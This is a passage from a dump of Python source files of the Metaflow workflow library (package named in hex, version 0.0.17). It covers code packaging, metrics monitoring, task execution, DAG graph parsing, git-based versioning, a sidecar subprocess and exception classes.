echo('\nPlease set them up first through ', nl=False)
echo('"https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html"',
fg='cyan') | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/main_cli.py | main_cli.py |
import os
import sys
import tarfile
import json
from hashlib import sha1
from itertools import chain
from .util import to_unicode
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
import io
BytesIO = io.BytesIO
DEFAULT_SUFFIXES = ['.py']
class MetaflowPackage(object):
def __init__(self, flow, environment, logger, suffixes=DEFAULT_SUFFIXES):
self.suffixes = list(set().union(suffixes, DEFAULT_SUFFIXES))
self.environment = environment
self.metaflow_root = os.path.dirname(__file__)
environment.init_environment(logger)
for step in flow:
for deco in step.decorators:
deco.package_init(flow,
step.__name__,
environment)
self.blob, self.sha = self._make()
def _walk(self, root, exclude_hidden=True):
root = to_unicode(root) # handle files/folder with non ascii chars
prefixlen = len('%s/' % os.path.dirname(root))
for path, dirs, files in os.walk(root):
if exclude_hidden and '/.' in path:
continue
# path = path[2:] # strip the ./ prefix
# if path and (path[0] == '.' or './' in path):
# continue
for fname in files:
if fname[0] == '.':
continue
if any(fname.endswith(suffix) for suffix in self.suffixes):
p = os.path.join(path, fname)
yield p, p[prefixlen:]
def path_tuples(self):
"""
Returns list of (path, arcname) to be added to the job package, where
`arcname` is the alternative name for the file in the package.
"""
# We want the following contents in the tarball
# Metaflow package itself
for path_tuple in self._walk(self.metaflow_root, exclude_hidden=False):
yield path_tuple
# the package folders for environment
for path_tuple in self.environment.add_to_package():
yield path_tuple
# the user's working directory
flowdir = os.path.dirname(os.path.abspath(sys.argv[0])) + '/'
for path_tuple in self._walk(flowdir):
yield path_tuple
def _add_info(self, tar):
info = tarfile.TarInfo('INFO')
env = self.environment.get_environment_info()
buf = BytesIO()
buf.write(json.dumps(env).encode('utf-8'))
buf.seek(0)
info.size = len(buf.getvalue())
tar.addfile(info, buf)
def _make(self):
def no_mtime(tarinfo):
# a modification time change should not change the hash of
# the package. Only content modifications will.
tarinfo.mtime = 0
return tarinfo
buf = BytesIO()
with tarfile.TarFile(fileobj=buf, mode='w') as tar:
self._add_info(tar)
for path, arcname in self.path_tuples():
tar.add(path, arcname=arcname,
recursive=False, filter=no_mtime)
blob = buf.getvalue()
return blob, sha1(blob).hexdigest()
def __str__(self):
return '<code package %s>' % self.sha | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/package.py | package.py |
import time
from contextlib import contextmanager
from .sidecar import SidecarSubProcess
from .sidecar_messages import Message, MessageTypes
COUNTER_TYPE = "COUNTER"
GAUGE_TYPE = "GAUGE"
MEASURE_TYPE = "MEASURE"
TIMER_TYPE = "TIMER"
class Monitor(object):
def __init__(self, monitor_type, env, flow_name):
# type: (str) -> None
self.sidecar_process = None
self.monitor_type = monitor_type
self.env_info = env.get_environment_info()
self.env_info["flow_name"] = flow_name
def start(self):
if self.sidecar_process is None:
self.sidecar_process = SidecarSubProcess(self.monitor_type)
@contextmanager
def count(self, name,):
if self.sidecar_process is not None:
counter = Counter(name, self.env_info)
counter.increment()
payload = {
'counter': counter.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
yield
self.sidecar_process.msg_handler(msg)
else:
yield
@contextmanager
def measure(self, name):
if self.sidecar_process is not None:
timer = Timer(name + "_timer", self.env_info)
counter = Counter(name + "_counter", self.env_info)
timer.start()
counter.increment()
yield
timer.end()
payload = {
'counter': counter.to_dict(),
'timer': timer.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
self.sidecar_process.msg_handler(msg)
else:
yield
def gauge(self, gauge):
if self.sidecar_process is not None:
payload = {
'gauge': gauge.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
self.sidecar_process.msg_handler(msg)
def terminate(self):
if self.sidecar_process is not None:
self.sidecar_process.kill()
class Metric(object):
"""
Abstract base class
"""
def __init__(self, type, env):
self._env = env
self._type = type
@property
def name(self):
raise NotImplementedError()
@property
def flow_name(self):
return self._env['flow_name']
@property
def env(self):
return self._env
@property
def value(self):
raise NotImplementedError()
def set_env(self, env):
self._env = env
def to_dict(self):
return {
'_env': self._env,
'_type': self._type,
}
class Timer(Metric):
def __init__(self, name, env):
super(Timer, self).__init__(TIMER_TYPE, env)
self._name = name
self._start = 0
self._end = 0
@property
def name(self):
return self._name
def start(self):
self._start = time.time()
def end(self):
self._end = time.time()
def set_start(self, start):
self._start = start
def set_end(self, end):
self._end = end
def get_duration(self):
return self._end - self._start
@property
def value(self):
return (self._end - self._start) * 1000
def to_dict(self):
parent_dict = super(Timer, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_start'] = self._start
parent_dict['_end'] = self._end
return parent_dict
class Counter(Metric):
def __init__(self, name, env):
super(Counter, self).__init__(COUNTER_TYPE, env)
self._name = name
self._count = 0
@property
def name(self):
return self._name
def increment(self):
self._count += 1
def set_count(self, count):
self._count = count
@property
def value(self):
return self._count
def to_dict(self):
parent_dict = super(Counter, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_count'] = self._count
return parent_dict
class Gauge(Metric):
def __init__(self, name, env):
super(Gauge, self).__init__(GAUGE_TYPE, env)
self._name = name
self._value = 0
@property
def name(self):
return self._name
def set_value(self, val):
self._value = val
def increment(self):
self._value += 1
@property
def value(self):
return self._value
def to_dict(self):
parent_dict = super(Gauge, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_value'] = self.value
return parent_dict
def deserialize_metric(metrics_dict):
if metrics_dict is None:
return
type = metrics_dict.get('_type')
name = metrics_dict.get('_name')
if type == COUNTER_TYPE:
try:
counter = Counter(name, None)
counter.set_env(metrics_dict.get('_env'))
except Exception as ex:
return
counter.set_count(metrics_dict.get('_count'))
return counter
elif type == TIMER_TYPE:
timer = Timer(name, None)
timer.set_start(metrics_dict.get('_start'))
timer.set_end(metrics_dict.get('_end'))
timer.set_env(metrics_dict.get('_env'))
return timer
elif type == GAUGE_TYPE:
gauge = Gauge(name, None)
gauge.set_env(metrics_dict.get('_env'))
gauge.set_value(metrics_dict.get('_value'))
return gauge
else:
raise NotImplementedError("UNSUPPORTED MESSAGE TYPE IN MONITOR")
def get_monitor_msg_type(msg):
if msg.payload.get('gauge') is not None:
return GAUGE_TYPE
if msg.payload.get('counter') is not None:
if msg.payload.get('timer') is not None:
return MEASURE_TYPE
return COUNTER_TYPE | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/monitor.py | monitor.py |
from __future__ import print_function
import sys
import os
import time
from .metaflow_config import MAX_ATTEMPTS
from .metadata import MetaDatum
from .datastore import Inputs, MetaflowDatastoreSet
from .exception import MetaflowInternalError,\
MetaflowDataMissing,\
MetaflowExceptionWrapper
from .util import all_equal,\
get_username,\
resolve_identity
from .current import current
from collections import namedtuple
ForeachFrame = namedtuple('ForeachFrame',
['step', 'var', 'num_splits', 'index'])
class MetaflowTask(object):
"""
MetaflowTask prepares a Flow instance for execution of a single step.
"""
def __init__(self,
flow,
datastore,
metadata,
environment,
console_logger,
event_logger,
monitor):
self.flow = flow
self.datastore = datastore
self.metadata = metadata
self.environment = environment
self.console_logger = console_logger
self.event_logger = event_logger
self.monitor = monitor
def _exec_step_function(self, step_function, input_obj=None):
self.environment.validate_environment(logger=self.console_logger)
if input_obj is None:
step_function()
else:
step_function(input_obj)
def _init_parameters(self, parameter_ds):
# overwrite Parameters in the flow object
vars = []
for var, param in self.flow._get_parameters():
# make the parameter a read-only property
# note x=x binds the current value of x to the closure
def property_setter(_, cls=self.flow.__class__, var=var, parameter_ds=parameter_ds):
v = parameter_ds[var]
setattr(cls, var, property(fget=lambda _, val=v: val))
return v
setattr(self.flow.__class__, var,
property(fget=property_setter))
vars.append(var)
self.flow._datastore.passdown_partial(parameter_ds, vars)
def _init_data(self, run_id, join_type, input_paths):
# We prefer to use the parallelized version to initialize datastores
# (via MetaflowDatastoreSet) only with more than 4 datastores, because
# the baseline overhead of using the set is ~1.5s and each datastore
# init takes ~200-300ms when run sequentially.
if len(input_paths) > 4:
prefetch_data_artifacts = None
if join_type and join_type == 'foreach':
# Prefetch 'foreach' related artifacts to improve time taken by
# _init_foreach.
prefetch_data_artifacts = \
['_foreach_stack', '_foreach_num_splits', '_foreach_var']
# Note: Specify `pathspecs` while creating the datastore set to
# guarantee strong consistency and guard against missing input.
datastore_set = \
MetaflowDatastoreSet(self.datastore,
self.flow.name,
run_id,
pathspecs=input_paths,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor,
prefetch_data_artifacts=prefetch_data_artifacts)
ds_list = [ds for ds in datastore_set]
if len(ds_list) != len(input_paths):
raise MetaflowDataMissing("Some input datastores are missing. "
"Expected: %d Actual: %d" %
(len(input_paths), len(ds_list)))
else:
# initialize directly in the single input case.
ds_list = []
for input_path in input_paths:
run_id, step_name, task_id = input_path.split('/')
ds_list.append(
self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor))
if not ds_list:
# this guards against errors in input paths
raise MetaflowDataMissing("Input paths *%s* resolved to zero "
"inputs" % ','.join(input_paths))
return ds_list
def _init_foreach(self, step_name, join_type, inputs, split_index):
# these variables are only set by the split step in the output
# data. They don't need to be accessible in the flow.
self.flow._foreach_var = None
self.flow._foreach_num_splits = None
# There are three cases that can alter the foreach state:
# 1) start - initialize an empty foreach stack
# 2) join - pop the topmost frame from the stack
# 3) step following a split - push a new frame in the stack
# case 1) - reset the stack
if step_name == 'start':
self.flow._foreach_stack = []
# case 2) - this is a join step
elif join_type:
# assert the lineage of incoming branches
def lineage():
for i in inputs:
if join_type == 'foreach':
top = i['_foreach_stack'][-1]
bottom = i['_foreach_stack'][:-1]
# the topmost indices in the stack are all
# different naturally, so ignore them in the
# assertion
yield bottom + [top._replace(index=0)]
else:
yield i['_foreach_stack']
if not all_equal(lineage()):
raise MetaflowInternalError("Step *%s* tried to join branches "
"whose lineages don't match."
% step_name)
# assert that none of the inputs are splits - we don't
# allow empty foreaches (joins immediately following splits)
if any(not i.is_none('_foreach_var') for i in inputs):
raise MetaflowInternalError("Step *%s* tries to join a foreach "
"split with no intermediate steps."
% step_name)
inp = inputs[0]
if join_type == 'foreach':
# Make sure that the join got all splits as its inputs.
# Datastore.resolve() leaves out all undone tasks, so if
# something strange happened upstream, the inputs list
# may not contain all inputs which should raise an exception
stack = inp['_foreach_stack']
if len(inputs) != stack[-1].num_splits:
raise MetaflowDataMissing("Foreach join *%s* expected %d "
"splits but only %d inputs were "
"found" % (step_name,
stack[-1].num_splits,
len(inputs)))
# foreach-join pops the topmost frame from the stack
self.flow._foreach_stack = stack[:-1]
else:
# a non-foreach join doesn't change the stack
self.flow._foreach_stack = inp['_foreach_stack']
# case 3) - our parent was a split. Initialize a new foreach frame.
elif not inputs[0].is_none('_foreach_var'):
if len(inputs) != 1:
raise MetaflowInternalError("Step *%s* got multiple inputs "
"although it follows a split step."
% step_name)
if split_index is None:
raise MetaflowInternalError("Step *%s* follows a split step "
"but no split_index is "
"specified." % step_name)
# push a new index after a split to the stack
frame = ForeachFrame(step_name,
inputs[0]['_foreach_var'],
inputs[0]['_foreach_num_splits'],
split_index)
stack = inputs[0]['_foreach_stack']
stack.append(frame)
self.flow._foreach_stack = stack
def _clone_flow(self, datastore):
x = self.flow.__class__(use_cli=False)
x._set_datastore(datastore)
return x
def clone_only(self, step_name, run_id, task_id, clone_origin_task):
if not clone_origin_task:
raise MetaflowInternalError("task.clone_only needs a valid "
"clone_origin_task value.")
# 1. initialize output datastore
output = self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
mode='w',
metadata=self.metadata,
attempt=0,
event_logger=self.event_logger,
monitor=self.monitor)
origin_run_id, origin_step_name, origin_task_id =\
clone_origin_task.split('/')
# 2. initialize origin datastore
origin = self.datastore(self.flow.name,
run_id=origin_run_id,
step_name=origin_step_name,
task_id=origin_task_id,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor)
output.clone(origin)
output.done()
def run_step(self,
step_name,
run_id,
task_id,
origin_run_id,
input_paths,
split_index,
retry_count,
max_user_code_retries):
if run_id and task_id:
self.metadata.register_run_id(run_id)
self.metadata.register_task_id(run_id, step_name, task_id)
else:
raise MetaflowInternalError("task.run_step needs a valid run_id "
"and task_id")
if retry_count >= MAX_ATTEMPTS:
# any results with an attempt ID >= MAX_ATTEMPTS will be ignored
# by datastore, so running a task with such a retry_could would
# be pointless and dangerous
raise MetaflowInternalError("Too many task attempts (%d)! "
"MAX_ATTEMPTS exceeded." % retry_count)
self.metadata.register_metadata(run_id,
step_name,
task_id,
[MetaDatum(field='attempt',
value=str(retry_count),
type='attempt'),
MetaDatum(field='origin-run-id',
value=str(origin_run_id),
type='origin-run-id')])
step_func = getattr(self.flow, step_name)
node = self.flow._graph[step_name]
join_type = None
if node.type == 'join':
join_type = self.flow._graph[node.split_parents[-1]].type
# 1. initialize output datastore
output = self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
mode='w',
metadata=self.metadata,
attempt=retry_count,
event_logger=self.event_logger,
monitor=self.monitor)
if input_paths:
# 2. initialize input datastores
inputs = self._init_data(run_id, join_type, input_paths)
# 3. initialize foreach state
self._init_foreach(step_name, join_type, inputs, split_index)
# 4. initialize the current singleton
current._set_env(self.flow.name,
run_id,
step_name,
task_id,
origin_run_id,
resolve_identity(),
get_username())
# 5. run task
output.save_metadata('task_begin', {
'code_package_sha': os.environ.get('METAFLOW_CODE_SHA'),
'code_package_ds': os.environ.get('METAFLOW_CODE_DS'),
'code_package_url': os.environ.get('METAFLOW_CODE_URL'),
'retry_count': retry_count
})
logger = self.event_logger
start = time.time()
try:
# init side cars
logger.start()
msg = {
"task_id": task_id,
"msg": 'task starting',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name,
"ts": round(time.time())
}
logger.log(msg)
self.flow._current_step = step_name
self.flow._success = False
self.flow._task_ok = None
self.flow._exception = None
# Note: All internal flow attributes (ie: non-user artifacts)
# should either be set prior to running the user code or listed in
# FlowSpec._EPHEMERAL to allow for proper merging/importing of
# user artifacts in the user's step code.
decorators = step_func.decorators
for deco in decorators:
deco.task_pre_step(step_name,
output,
self.metadata,
run_id,
task_id,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
# decorators can actually decorate the step function,
# or they can replace it altogether. This functionality
# is used e.g. by catch_decorator which switches to a
# fallback code if the user code has failed too many
# times.
step_func = deco.task_decorate(step_func,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
if join_type:
# Join step:
# Ensure that we have the right number of inputs. The
# foreach case is checked above.
if join_type != 'foreach' and\
len(inputs) != len(node.in_funcs):
raise MetaflowDataMissing("Join *%s* expected %d "
"inputs but only %d inputs "
"were found"
% (step_name,
len(node.in_funcs),
len(inputs)))
# Multiple input contexts are passed in as an argument
# to the step function.
input_obj = Inputs(self._clone_flow(inp) for inp in inputs)
self.flow._set_datastore(output)
# initialize parameters (if they exist)
# We take Parameter values from the first input,
# which is always safe since parameters are read-only
self._init_parameters(inputs[0])
self._exec_step_function(step_func, input_obj)
else:
# Linear step:
# We are running with a single input context.
# The context is embedded in the flow.
if len(inputs) > 1:
# This should be captured by static checking but
# let's assert this again
raise MetaflowInternalError("Step *%s* is not a join "
"step but it gets multiple "
"inputs." % step_name)
self.flow._set_datastore(inputs[0])
if input_paths:
# initialize parameters (if they exist)
# We take Parameter values from the first input,
# which is always safe since parameters are read-only
self._init_parameters(inputs[0])
self._exec_step_function(step_func)
for deco in decorators:
deco.task_post_step(step_name,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
self.flow._task_ok = True
self.flow._success = True
except Exception as ex:
tsk_msg = {
"task_id": task_id,
"exception_msg": str(ex),
"msg": 'task failed with exception',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name
}
logger.log(tsk_msg)
exception_handled = False
for deco in decorators:
res = deco.task_exception(ex,
step_name,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
exception_handled = bool(res) or exception_handled
if exception_handled:
self.flow._task_ok = True
else:
self.flow._task_ok = False
self.flow._exception = MetaflowExceptionWrapper(ex)
print('%s failed:' % self.flow, file=sys.stderr)
raise
finally:
end = time.time() - start
msg = {
"task_id": task_id,
"msg": 'task ending',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name,
"ts": round(time.time()),
"runtime": round(end)
}
logger.log(msg)
output.save_metadata('task_end', {})
output.persist(self.flow)
# terminate side cars
logger.terminate()
# this writes a success marker indicating that the
# "transaction" is done
output.done()
# final decorator hook: The task results are now
# queryable through the client API / datastore
for deco in decorators:
deco.task_finished(step_name,
self.flow,
self.flow._graph,
self.flow._task_ok,
retry_count,
max_user_code_retries) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/task.py | task.py |
# This file is imported from https://github.com/aebrahim/python-git-version
from __future__ import print_function
from subprocess import check_output, CalledProcessError
from os import path, name, devnull, environ, listdir
__all__ = ("get_version",)
CURRENT_DIRECTORY = path.dirname(path.abspath(__file__))
VERSION_FILE = path.join(CURRENT_DIRECTORY, "VERSION")
GIT_COMMAND = "git"
if name == "nt":
def find_git_on_windows():
"""find the path to the git executable on windows"""
# first see if git is in the path
try:
check_output(["where", "/Q", "git"])
# if this command succeeded, git is in the path
return "git"
# catch the exception thrown if git was not found
except CalledProcessError:
pass
# There are several locations git.exe may be hiding
possible_locations = []
# look in program files for msysgit
if "PROGRAMFILES(X86)" in environ:
possible_locations.append("%s/Git/cmd/git.exe" %
environ["PROGRAMFILES(X86)"])
if "PROGRAMFILES" in environ:
possible_locations.append("%s/Git/cmd/git.exe" %
environ["PROGRAMFILES"])
# look for the github version of git
if "LOCALAPPDATA" in environ:
github_dir = "%s/GitHub" % environ["LOCALAPPDATA"]
if path.isdir(github_dir):
for subdir in listdir(github_dir):
if not subdir.startswith("PortableGit"):
continue
possible_locations.append("%s/%s/bin/git.exe" %
(github_dir, subdir))
for possible_location in possible_locations:
if path.isfile(possible_location):
return possible_location
# git was not found
return "git"
GIT_COMMAND = find_git_on_windows()
def call_git_describe(abbrev=7):
"""return the string output of git desribe"""
try:
# first, make sure we are actually in a Metaflow repo,
# not some other repo
with open(devnull, 'w') as fnull:
arguments = [GIT_COMMAND, "rev-parse", "--show-toplevel"]
reponame = check_output(arguments, cwd=CURRENT_DIRECTORY,
stderr=fnull).decode("ascii").strip()
if path.basename(reponame) != 'metaflow':
return None
with open(devnull, "w") as fnull:
arguments = [GIT_COMMAND, "describe", "--tags",
"--abbrev=%d" % abbrev]
return check_output(arguments, cwd=CURRENT_DIRECTORY,
stderr=fnull).decode("ascii").strip()
except (OSError, CalledProcessError):
return None
def format_git_describe(git_str, pep440=False):
"""format the result of calling 'git describe' as a python version"""
if git_str is None:
return None
if "-" not in git_str: # currently at a tag
return git_str
else:
# formatted as version-N-githash
# want to convert to version.postN-githash
git_str = git_str.replace("-", ".post", 1)
if pep440: # does not allow git hash afterwards
return git_str.split("-")[0]
else:
return git_str.replace("-g", "+git")
def read_release_version():
"""Read version information from VERSION file"""
try:
with open(VERSION_FILE, "r") as infile:
version = str(infile.read().strip())
if len(version) == 0:
version = None
return version
except IOError:
return None
def update_release_version():
"""Update VERSION file"""
version = get_version(pep440=True)
with open(VERSION_FILE, "w") as outfile:
outfile.write(version)
outfile.write("\n")
def get_version(pep440=False):
"""Tracks the version number.
pep440: bool
When True, this function returns a version string suitable for
a release as defined by PEP 440. When False, the githash (if
available) will be appended to the version string.
The file VERSION holds the version information. If this is not a git
repository, then it is reasonable to assume that the version is not
being incremented and the version returned will be the release version as
read from the file.
However, if the script is located within an active git repository,
git-describe is used to get the version information.
The file VERSION will need to be changed by manually. This should be done
before running git tag (set to the same as the version in the tag).
"""
git_version = format_git_describe(call_git_describe(), pep440=pep440)
if git_version is None: # not a git repository
import metaflow
return metaflow.__version__
else:
return git_version | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metaflow_version.py | metaflow_version.py |
import inspect
import ast
import re
def deindent_docstring(doc):
if doc:
return re.sub(r'\n[\t ]+', '\n', doc).strip()
else:
return ''
class DAGNode(object):
def __init__(self, func_ast, decos, doc):
self.name = func_ast.name
self.func_lineno = func_ast.lineno
self.decorators = decos
self.doc = deindent_docstring(doc)
# these attributes are populated by _parse
self.tail_next_lineno = 0
self.type = None
self.out_funcs = []
self.has_tail_next = False
self.invalid_tail_next = False
self.num_args = 0
self.condition = None
self.foreach_param = None
self._parse(func_ast)
# these attributes are populated by _traverse_graph
self.in_funcs = set()
self.split_parents = []
self.matching_join = None
# these attributes are populated by _postprocess
self.is_inside_foreach = False
def _expr_str(self, expr):
return '%s.%s' % (expr.value.id, expr.attr)
def _parse(self, func_ast):
self.num_args = len(func_ast.args.args)
tail = func_ast.body[-1]
# end doesn't need a transition
if self.name == 'end':
# TYPE: end
self.type = 'end'
# ensure that the tail an expression
if not isinstance(tail, ast.Expr):
return
# determine the type of self.next transition
try:
if not self._expr_str(tail.value.func) == 'self.next':
return
self.has_tail_next = True
self.invalid_tail_next = True
self.tail_next_lineno = tail.lineno
self.out_funcs = [e.attr for e in tail.value.args]
keywords = dict((k.arg, k.value.s) for k in tail.value.keywords)
if len(keywords) == 1:
if 'foreach' in keywords:
# TYPE: foreach
self.type = 'foreach'
if len(self.out_funcs) == 1:
self.foreach_param = keywords['foreach']
self.invalid_tail_next = False
elif 'condition' in keywords:
# TYPE: split-or
self.type = 'split-or'
if len(self.out_funcs) == 2:
self.condition = keywords['condition']
self.invalid_tail_next = False
elif len(keywords) == 0:
if len(self.out_funcs) > 1:
# TYPE: split-and
self.type = 'split-and'
self.invalid_tail_next = False
elif len(self.out_funcs) == 1:
# TYPE: linear
if self.num_args > 1:
self.type = 'join'
else:
self.type = 'linear'
self.invalid_tail_next = False
except AttributeError:
return
def __str__(self):
return\
"""*[{0.name} {0.type} (line {0.func_lineno})]*
in_funcs={in_funcs}
split_parents={parents}
matching_join={matching_join}
is_inside_foreach={is_inside_foreach}
decorators={decos}
num_args={0.num_args}
has_tail_next={0.has_tail_next} (line {0.tail_next_lineno})
invalid_tail_next={0.invalid_tail_next}
condition={0.condition}
foreach_param={0.foreach_param}
-> {out}"""\
.format(self,
matching_join=self.matching_join and '[%s]' % self.matching_join,
is_inside_foreach=self.is_inside_foreach,
in_funcs=', '.join('[%s]' % x for x in self.in_funcs),
parents=', '.join('[%s]' % x for x in self.split_parents),
decos=' | '.join(map(str, self.decorators)),
out=', '.join('[%s]' % x for x in self.out_funcs))
class StepVisitor(ast.NodeVisitor):
def __init__(self, nodes, flow):
self.nodes = nodes
self.flow = flow
super(StepVisitor, self).__init__()
def visit_FunctionDef(self, node):
func = getattr(self.flow, node.name)
if hasattr(func, 'is_step'):
self.nodes[node.name] = DAGNode(node, func.decorators, func.__doc__)
class FlowGraph(object):
def __init__(self, flow):
self.name = flow.__name__
self.nodes = self._create_nodes(flow)
self.doc = deindent_docstring(flow.__doc__)
self._traverse_graph()
self._postprocess()
def _create_nodes(self, flow):
module = __import__(flow.__module__)
tree = ast.parse(inspect.getsource(module)).body
root = [n for n in tree\
if isinstance(n, ast.ClassDef) and n.name == self.name][0]
nodes = {}
StepVisitor(nodes, flow).visit(root)
return nodes
def _postprocess(self):
# any node who has a foreach as any of its split parents
# has is_inside_foreach=True *unless* all of those foreaches
# are joined by the node
for node in self.nodes.values():
foreaches = [p for p in node.split_parents
if self.nodes[p].type == 'foreach']
if [f for f in foreaches
if self.nodes[f].matching_join != node.name]:
node.is_inside_foreach = True
def _traverse_graph(self):
def traverse(node, seen, split_parents):
if node.type in ('split-or', 'split-and', 'foreach'):
node.split_parents = split_parents
split_parents = split_parents + [node.name]
elif node.type == 'join':
# ignore joins without splits
if split_parents:
self[split_parents[-1]].matching_join = node.name
node.split_parents = split_parents
split_parents = split_parents[:-1]
else:
node.split_parents = split_parents
for n in node.out_funcs:
# graph may contain loops - ignore them
if n not in seen:
# graph may contain unknown transitions - ignore them
if n in self:
child = self[n]
child.in_funcs.add(node.name)
traverse(child, seen + [n], split_parents)
if 'start' in self:
traverse(self['start'], [], [])
# fix the order of in_funcs
for node in self.nodes.values():
node.in_funcs = sorted(node.in_funcs)
def __getitem__(self, x):
return self.nodes[x]
def __contains__(self, x):
return x in self.nodes
def __iter__(self):
return iter(self.nodes.values())
def __str__(self):
return '\n'.join(str(n) for _, n in sorted((n.func_lineno, n)\
for n in self.nodes.values()))
def output_dot(self):
def edge_specs():
for node in self.nodes.values():
for edge in node.out_funcs:
yield '%s -> %s;' % (node.name, edge)
def node_specs():
for node in self.nodes.values():
nodetype = 'join' if node.num_args > 1 else node.type
yield '"{0.name}"'\
'[ label = <<b>{0.name}</b> | <font point-size="10">{type}</font>> '\
' fontname = "Helvetica" '\
' shape = "record" ];'.format(node, type=nodetype)
return "digraph {0.name} {{\n"\
"rankdir=LR;\n"\
"{nodes}\n"\
"{edges}\n"\
"}}".format(self,
nodes='\n'.join(node_specs()),
edges='\n'.join(edge_specs())) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/graph.py | graph.py |
from __future__ import print_function
import subprocess
import fcntl
import select
import os
import sys
import platform
from fcntl import F_SETFL
from os import O_NONBLOCK
from .sidecar_messages import Message, MessageTypes
from .debug import debug
MESSAGE_WRITE_TIMEOUT_IN_MS = 1000
NULL_SIDECAR_PREFIX = "nullSidecar"
# for python 2 compatibility
try:
blockingError = BlockingIOError
except:
blockingError = OSError
class PipeUnavailableError(Exception):
"""raised when unable to write to pipe given allotted time"""
pass
class NullSidecarError(Exception):
"""raised when tyring to poll or interact with the fake subprocess in the null sidecar"""
pass
class MsgTimeoutError(Exception):
"""raised when tyring unable to send message to sidecar in allocated time"""
pass
class NullPoller(object):
def poll(self, timeout):
raise NullSidecarError()
class SidecarSubProcess(object):
def __init__(self, worker_type):
# type: (str) -> None
self.__worker_type = worker_type
self.__process = None
self.__poller = None
self.start()
def start(self):
if (self.__worker_type is not None and \
self.__worker_type.startswith(NULL_SIDECAR_PREFIX)) or \
platform.system() == 'Darwin':
self.__poller = NullPoller()
else:
from select import poll
python_version = sys.executable
cmdline = [python_version,
'-u',
os.path.dirname(__file__) + '/sidecar_worker.py',
self.__worker_type]
debug.sidecar_exec(cmdline)
self.__process = self.__start_subprocess(cmdline)
if self.__process is not None:
fcntl.fcntl(self.__process.stdin, F_SETFL, O_NONBLOCK)
self.__poller = poll()
self.__poller.register(self.__process.stdin.fileno(),
select.POLLOUT)
else:
# unable to start subprocess, fallback to Null sidecar
self.logger("unable to start subprocess for sidecar %s"
% self.__worker_type)
self.__poller = NullPoller()
def __start_subprocess(self, cmdline):
for i in range(3):
try:
return subprocess.Popen(cmdline,
stdin=subprocess.PIPE,
stdout=open(os.devnull, 'w'),
bufsize=0)
except blockingError as be:
self.logger("warning: sidecar popen failed: %s" % repr(be))
except Exception as e:
self.logger(repr(e))
break
def kill(self):
try:
msg = Message(MessageTypes.SHUTDOWN, None)
self.emit_msg(msg)
except:
pass
def emit_msg(self, msg):
msg_ser = msg.serialize().encode('utf-8')
written_bytes = 0
while written_bytes < len(msg_ser):
try:
fds = self.__poller.poll(MESSAGE_WRITE_TIMEOUT_IN_MS)
if fds is None or len(fds) == 0:
raise MsgTimeoutError("poller timed out")
for fd, event in fds:
if event & select.POLLERR:
raise PipeUnavailableError('pipe unavailable')
f = os.write(fd, msg_ser[written_bytes:])
written_bytes += f
except NullSidecarError:
# sidecar is disabled, ignore all messages
break
def msg_handler(self, msg, retries=3):
try:
self.emit_msg(msg)
except MsgTimeoutError:
# drop message, do not retry on timeout
self.logger("unable to send message due to timeout")
except Exception as ex:
if isinstance(ex, PipeUnavailableError):
self.logger("restarting sidecar %s" % self.__worker_type)
self.start()
if retries > 0:
self.logger("retrying msg send to sidecar")
self.msg_handler(msg, retries-1)
else:
self.logger("error sending log message")
self.logger(repr(ex))
def logger(self, msg):
print("metaflow logger: " + msg, file=sys.stderr) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/sidecar.py | sidecar.py |
import sys
import traceback
# worker processes that exit with this exit code are not retried
METAFLOW_EXIT_DISALLOW_RETRY = 202
# worker processes that exit with this code should be retried (if retry counts left)
METAFLOW_EXIT_ALLOW_RETRY = 203
class MetaflowExceptionWrapper(Exception):
def __init__(self, exc=None):
if exc is not None:
self.exception = str(exc)
self.type = '%s.%s' % (exc.__class__.__module__,
exc.__class__.__name__)
if sys.exc_info()[0] is None:
self.stacktrace = None
else:
self.stacktrace = traceback.format_exc()
# Base Exception defines its own __reduce__ and __setstate__
# which don't work nicely with derived exceptions. We override
# the magic methods related to pickle to get desired behavior.
def __reduce__(self):
return MetaflowExceptionWrapper, (None,), self.__dict__
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
def __str__(self):
if self.stacktrace:
return self.stacktrace
else:
return '[no stacktrace]\n%s: %s' % (self.type, self.exception)
class MetaflowException(Exception):
headline = 'Flow failed'
def __init__(self, msg='', lineno=None):
self.message = msg
self.line_no = lineno
super(MetaflowException, self).__init__()
def __str__(self):
prefix = 'line %d: ' % self.line_no if self.line_no else ''
return '%s%s' % (prefix, self.message)
class ParameterFieldFailed(MetaflowException):
headline = "Parameter field failed"
def __init__(self, name, field):
exc = traceback.format_exc()
